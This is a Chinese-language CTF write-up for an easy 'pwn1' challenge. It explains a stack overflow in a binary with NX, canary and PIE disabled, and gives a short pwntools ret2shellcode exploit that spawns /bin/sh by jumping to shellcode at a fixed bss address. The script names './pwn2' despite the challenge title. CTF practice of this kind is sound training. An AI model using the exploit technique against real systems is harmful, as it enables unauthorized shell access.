### 1.题目名称

pwn1



### 2.题目类型

pwn(easy)



### 3.题目描述

你能拿到我的shell吗



### 4.考察知识点

考察基本的栈溢出和ret2shellcode



### 5.解题思路

vuln函数中具有明显的栈溢出，同时其将输入复制到全局变量bss段

因为程序没有开启NX可以在堆栈和bss段上执行shellcode

程序没有开启cannary等机制可以进行栈溢出

程序没有开启PIE，全局变量bss段地址固定

因此我们输入可以执行/bin/sh的shellcode，程序会将shellcode复制到0x804a040处

我们只需要将返回地址覆盖为0x804a040

即可执行我们的shellcode，从而拿到shell，进而cat flag

示例exp如下：

```
#!/usr/bin/env python
from pwn import *
sh = process('./pwn2')
bss_addr = 0x804a040
shellcode = asm(shellcraft.sh())
sh.sendline(shellcode.ljust(0x3a+4, 'A') + p32(bss_addr)) 
sh.interactive()
```

